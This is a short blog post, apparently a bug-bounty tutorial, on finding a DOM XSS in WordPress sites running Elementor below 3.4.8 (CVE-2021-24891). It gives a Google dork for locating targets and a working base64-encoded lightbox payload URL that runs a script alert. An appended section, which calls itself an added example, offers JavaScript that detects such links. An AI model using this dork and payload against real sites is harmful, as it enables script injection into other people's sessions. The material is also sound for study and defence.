DOM XSS using Google Dorks
Jul 23, 2023
Using Google dorks, we can find XSS.
For this, the target needs to be using WordPress. In this article I am going to use CVE-2021-24891. Please go through the articles on this CVE to learn about this DOM XSS; here I am going to help you find it.
Use the following dork to find websites that use the Elementor plugin:
site:target.com inurl:"elementor"
After that, check the Elementor version. For this vulnerability, the version needs to be lower than 3.4.8. You can use Wappalyzer or other tools.
https://target.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9
Now paste the given payload and reload the page.
We get a pop-up.
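The two checks above (is the Elementor version below 3.4.8, and what does the `settings` value in an `#elementor-action` link decode to) can be scripted to triage a site inventory or a reported link. This is an added example, not code from the original post or from Elementor: the function names and sample links are made up for illustration, `settings` is assumed to be base64-encoded JSON as in the URL shown above, and it runs under Node.js.

```javascript
// Added example: triage a link carrying an "#elementor-action" fragment.
// Runs under Node.js (uses Buffer and the built-in URL class).

// Compare dotted versions numerically; true when `v` is below `fixed`.
function isBelow(v, fixed) {
  const a = v.split(".").map(Number), b = fixed.split(".").map(Number);
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    const x = a[i] || 0, y = b[i] || 0;
    if (x !== y) return x < y;
  }
  return false;
}

// Decode the fragment's settings blob and report whether it carries markup.
function inspectElementorLink(link) {
  const hash = new URL(link).hash.slice(1); // text after '#'
  const prefix = "elementor-action:";
  if (!hash.startsWith(prefix)) return { elementorAction: false };
  const params = new URLSearchParams(hash.slice(prefix.length));
  const result = { elementorAction: true, action: params.get("action"), suspicious: false };
  const raw = params.get("settings");
  if (!raw) return result;
  try {
    // URLSearchParams turns a bare '+' into a space; undo that before decoding.
    const json = Buffer.from(raw.replace(/ /g, "+"), "base64").toString("utf8");
    result.settings = JSON.parse(json);
  } catch (e) {
    result.suspicious = true; // undecodable blob: flag for manual review
    result.error = "settings is not base64-encoded JSON";
    return result;
  }
  const s = result.settings;
  const html = s && typeof s.html === "string" ? s.html : "";
  // Any tag or inline event handler in the 'html' setting deserves a closer look.
  result.suspicious = /<\s*[a-z!\/]|on\w+\s*=/i.test(html);
  return result;
}

// Constructed sample links (not taken from real traffic).
const enc = (o) => encodeURIComponent(Buffer.from(JSON.stringify(o)).toString("base64"));
const BASE = "https://target.com/#elementor-action:action=lightbox&settings=";
const SAMPLE_MARKUP = BASE + enc({ type: "null", html: "<script>constructed()</script>" });
const SAMPLE_PLAIN = BASE + enc({ type: "image", url: "https://target.com/a.png" });
```

A site whose Elementor version makes `isBelow(version, "3.4.8")` return true should be updated, and links flagged as `suspicious` are worth reviewing before anyone opens them.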